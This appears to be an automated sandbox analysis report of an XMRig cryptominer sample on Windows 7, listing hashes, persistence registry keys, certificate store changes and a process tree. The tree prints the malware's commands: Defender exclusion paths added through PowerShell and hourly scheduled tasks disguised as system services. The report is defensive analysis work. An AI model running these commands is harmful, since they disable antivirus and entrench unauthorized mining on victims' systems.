xmrig | 932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2

Analysis

max time kernel
314s
max time network
219s
platform
windows7_x64
resource
win7-20220414-en
submitted
17-05-2022 22:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe
Size

16KB
MD5

23c8b23571c065c1d8c65beb2899cc42
SHA1

fd7f51575ccaeba2cd6cb0d2195e2be966c0fecf
SHA256

932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2
SHA512

af1df92b60d1cff475deb7688b7a8baff26feb240a0d48a9cd73df3d1a5b9acff72d353f686de259d3bd77c0df1a7f7b269434789189a26c46a02313bdb5e64c

Score

10^/10

xmrig miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 6 IoCs

miner

Processes:

resource	yara_rule
\ProgramData\Dllhost\winlogson.exe	xmrig
C:\ProgramData\Dllhost\winlogson.exe	xmrig
C:\ProgramData\Dllhost\winlogson.exe	xmrig
C:\ProgramData\Dllhost\winlogson.exe	xmrig
C:\ProgramData\Dllhost\winlogson.exe	xmrig
C:\ProgramData\Dllhost\winlogson.exe	xmrig

Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

dllhost.exewinlogson.exewinlogson.exewinlogson.exewinlogson.exewinlogson.exe

pid process

1340 dllhost.exe
872 winlogson.exe
968 winlogson.exe
576 winlogson.exe
1940 winlogson.exe
1140 winlogson.exe
Loads dropped DLL 2 IoCs

Processes:

932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.execmd.exe

pid process

824 932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe
1200 cmd.exe

pid	process
1340	dllhost.exe
872	winlogson.exe
968	winlogson.exe
576	winlogson.exe
1940	winlogson.exe
1140	winlogson.exe

pid	process
824	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe
1200	cmd.exe

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

dllhost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\AntiMalwareServiceExecutable = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2111.5-0\\MsMpEng.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpd = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\NvStray = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSystray = "C:\\Windows\\System32\\SecurityHealthSystray.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = "C:\\Program Files\\Windows Defender\\MpCmdRun.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe\\Cortana.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "C:\\ProgramData\\Dllhost\\dllhost.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveService = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe"	dllhost.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

432 1836 WerFault.exe schtasks.exe

pid	pid_target	process	target process
432	1836	WerFault.exe	schtasks.exe

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
872	schtasks.exe
844	schtasks.exe
880	schtasks.exe
2032	schtasks.exe
1200	schtasks.exe
788	schtasks.exe
344	schtasks.exe
1044	schtasks.exe
1992	schtasks.exe
1836	schtasks.exe
1180	schtasks.exe
1092	schtasks.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exedllhost.exe

pid	process
2040	powershell.exe
1868	powershell.exe
656	powershell.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe
1340	dllhost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exedllhost.exe

description	pid	process
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	656	powershell.exe
Token: SeDebugPrivilege	824	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe
Token: SeDebugPrivilege	1340	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.execmd.exedllhost.execmd.execmd.execmd.exe

description	pid	process	target process
PID 824 wrote to memory of 828	824	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe	cmd.exe
PID 824 wrote to memory of 828	824	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe	cmd.exe
PID 824 wrote to memory of 828	824	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe	cmd.exe
PID 824 wrote to memory of 828	824	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe	cmd.exe
PID 828 wrote to memory of 2000	828	cmd.exe	chcp.com
PID 828 wrote to memory of 2000	828	cmd.exe	chcp.com
PID 828 wrote to memory of 2000	828	cmd.exe	chcp.com
PID 828 wrote to memory of 2000	828	cmd.exe	chcp.com
PID 828 wrote to memory of 2040	828	cmd.exe	powershell.exe
PID 828 wrote to memory of 2040	828	cmd.exe	powershell.exe
PID 828 wrote to memory of 2040	828	cmd.exe	powershell.exe
PID 828 wrote to memory of 2040	828	cmd.exe	powershell.exe
PID 828 wrote to memory of 1868	828	cmd.exe	powershell.exe
PID 828 wrote to memory of 1868	828	cmd.exe	powershell.exe
PID 828 wrote to memory of 1868	828	cmd.exe	powershell.exe
PID 828 wrote to memory of 1868	828	cmd.exe	powershell.exe
PID 828 wrote to memory of 656	828	cmd.exe	powershell.exe
PID 828 wrote to memory of 656	828	cmd.exe	powershell.exe
PID 828 wrote to memory of 656	828	cmd.exe	powershell.exe
PID 828 wrote to memory of 656	828	cmd.exe	powershell.exe
PID 824 wrote to memory of 1340	824	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe	dllhost.exe
PID 824 wrote to memory of 1340	824	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe	dllhost.exe
PID 824 wrote to memory of 1340	824	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe	dllhost.exe
PID 824 wrote to memory of 1340	824	932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe	dllhost.exe
PID 1340 wrote to memory of 1576	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1576	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1576	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1576	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1496	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1496	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1496	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1496	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1484	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1484	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1484	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1484	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1872	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1872	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1872	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1872	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1012	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1012	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1012	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1012	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1604	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1604	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1604	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1604	1340	dllhost.exe	cmd.exe
PID 1496 wrote to memory of 1180	1496	cmd.exe	schtasks.exe
PID 1496 wrote to memory of 1180	1496	cmd.exe	schtasks.exe
PID 1496 wrote to memory of 1180	1496	cmd.exe	schtasks.exe
PID 1496 wrote to memory of 1180	1496	cmd.exe	schtasks.exe
PID 1340 wrote to memory of 1712	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1712	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1712	1340	dllhost.exe	cmd.exe
PID 1340 wrote to memory of 1712	1340	dllhost.exe	cmd.exe
PID 1576 wrote to memory of 2032	1576	cmd.exe	schtasks.exe
PID 1576 wrote to memory of 2032	1576	cmd.exe	schtasks.exe
PID 1576 wrote to memory of 2032	1576	cmd.exe	schtasks.exe
PID 1576 wrote to memory of 2032	1576	cmd.exe	schtasks.exe
PID 1872 wrote to memory of 880	1872	cmd.exe	schtasks.exe
PID 1872 wrote to memory of 880	1872	cmd.exe	schtasks.exe
PID 1872 wrote to memory of 880	1872	cmd.exe	schtasks.exe
PID 1872 wrote to memory of 880	1872	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe
"C:\Users\Admin\AppData\Local\Temp\932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:824

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\HostData"
2⤵
- Suspicious use of WriteProcessMemory
PID:828

C:\Windows\SysWOW64\chcp.com
chcp 1251
3⤵
PID:2000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\HostData"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:656

C:\ProgramData\Dllhost\dllhost.exe
"C:\ProgramData\Dllhost\dllhost.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1340

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1576

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:2032

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1496

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:1180

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:1484

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:1836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 280
5⤵
- Program crash
PID:432

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1872

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:880

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:1012

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:1992

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:1604

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:872

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:1988

C:\Windows\SysWOW64\schtasks.exe
